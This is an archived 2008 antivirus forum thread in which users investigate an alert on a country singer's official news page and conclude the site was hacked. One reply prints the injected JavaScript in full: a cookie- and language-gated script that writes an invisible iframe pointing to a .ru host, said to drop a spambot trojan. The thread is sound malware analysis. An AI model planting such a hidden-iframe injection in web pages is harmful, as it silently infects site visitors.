Author Topic: A probable fp in georgestrait.com  (Read 3876 times)

0 Members and 1 Guest are viewing this topic.

rdmaloyjr

  • Guest
A probable fp in georgestrait.com
« on: July 26, 2008, 08:19:22 PM »
Trojan detected in hxxp://www.georgestrait.com/news.asp  JS:Aspxor-A [trj]

A scan of that link with Dr. Web link scanner comes back clean.

I'm not a fan of George Strait, but my sister is.  She was using my computer to visit his website where she discovered it by an alert from avast! WebShield.
« Last Edit: July 27, 2008, 03:12:06 AM by rdmaloyjr »

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34051
  • malware fighter
Re: A probable fp in georgestrait.com
« Reply #1 on: July 26, 2008, 08:52:56 PM »
Hi rdmaloyjr,

Had she visited the site with Firefox with the NoScript add-on active, there would not be a detection.
The main site is clean according to Finjan, but this one is no the direct to:
wxw.poemhunter.com/lyrics/george-strait/resources/
She might have clicked that re-direct?

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89670
  • No support PMs thanks
Re: A probable fp in georgestrait.com
« Reply #2 on: July 26, 2008, 09:33:09 PM »
There are lots of external .js script files, perhaps avast is objecting to one of those. As polonus with NoScript there is no avast alert, so it is more possible that it is either the page or external javascript at issue.

Interestingly some of these scripts are hosted on .ru domains whilst the georgestrait.com is in the US.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD - 27" external monitor 1440p 2560x1440 resolution - avast! free  24.9.6130 (build 24.9.9452.762) UI 1.0.818/ Firefox, uBlock Origin Lite, uMatrix/ MailWasher Pro/ Avast! Mobile Security

solcroft

  • Guest
Re: A probable fp in georgestrait.com
« Reply #3 on: July 26, 2008, 10:51:16 PM »
Not an FP. Here's the code of the js file:
Code: [Select]
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://ncwc.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}}

I can't access the iframed website since they seem to implement some IP checking mechanism to prevent repeat visits, but I've seen this one enough times before to know that it tries to drop a spambot trojan on your computer.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89670
  • No support PMs thanks
Re: A probable fp in georgestrait.com
« Reply #4 on: July 26, 2008, 11:26:41 PM »
Yes, looks like the site has been hacked.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD - 27" external monitor 1440p 2560x1440 resolution - avast! free  24.9.6130 (build 24.9.9452.762) UI 1.0.818/ Firefox, uBlock Origin Lite, uMatrix/ MailWasher Pro/ Avast! Mobile Security